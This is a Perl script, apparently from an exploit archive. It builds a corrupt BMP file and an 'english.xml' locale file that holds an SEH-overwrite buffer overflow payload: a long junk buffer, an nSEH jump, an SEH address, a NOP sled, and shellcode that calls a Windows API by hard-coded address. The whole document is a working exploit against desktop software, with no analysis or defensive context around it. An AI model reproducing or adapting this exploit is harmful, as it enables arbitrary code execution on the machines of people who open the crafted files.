#!/usr/bin/perl
sub
write_file {
my
(
$file
,
$buffer
) =
@_
;
open
(FILE,
">$file"
);
print
FILE
$buffer
;
close
(FILE);
print
"Exploit file ["
.
$file
.
"] created\n"
;
print
"Buffer size: "
.
length
(
$buffer
) .
"\n"
;
}
sub
bmp_header {
my
$header
=
"\x42\x4d"
;
$header
=
$header
.
"\x46\x00\x00\x00"
;
$header
=
$header
.
"\x00\x00\x00\x00"
;
$header
=
$header
.
"\x36\x00\x00\x00"
;
$header
=
$header
.
"\x28\x00\x00\x00"
;
$header
=
$header
.
"\x02\x00\x00\x00"
;
$header
=
$header
.
"\x02\x00\x00\x00"
;
$header
=
$header
.
"\x01\x00"
;
$header
=
$header
.
"\x18\x00"
;
$header
=
$header
.
"\x00\x00\x00\x00"
;
$header
=
$header
.
"\x10\x00\x00\x00"
;
$header
=
$header
.
"\x13\x0b\x00\x00"
;
$header
=
$header
.
"\x13\x0b\x00\x00"
;
$header
=
$header
.
"\x00\x00\x00\x00"
;
$header
=
$header
.
"\x00\x00\x00\x00"
;
return
$header
;
}
my
$header
= bmp_header();
my
$data
=
"\x41"
x (5000 -
length
(
$header
));
my
$buffer
=
$header
.
$data
;
write_file(
"corrupt.bmp"
,
$buffer
);
my
$buffsize
= 100000;
my
$junk
=
"\x41"
x 62504;
my
$nseh
=
"\xeb\x32\x90\x90"
;
my
$seh
=
pack
(
'V'
, 0x74c82f4f);
my
$junk2
=
"\x41"
x 12;
my
$nops
=
"\x90"
x 100;
my
$shell
=
"\xb9\x7c\xec\xa5\x7c"
.
"\x31\xc0"
.
"\xbb\xb2\x1b\x86\x7c"
.
"\x51"
.
"\x50"
.
"\xff\xd3"
;
my
$sploit
=
$junk
.
$nseh
.
$seh
.
$junk2
.
$nseh
.
$seh
.
$nops
.
$shell
;
my
$fill
=
"\x43"
x (
$buffsize
- (
length
(
$sploit
)));
$sploit
=
$sploit
.
$fill
;
my
$xml
=
'<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">'
;
$xml
=
$xml
.
$sploit
;
$xml
=
$xml
.
'</message></warning></image></corrupt></exception></locale>'
;
my
$buffer
=
$xml
;
write_file(
"english.xml"
,
$buffer
);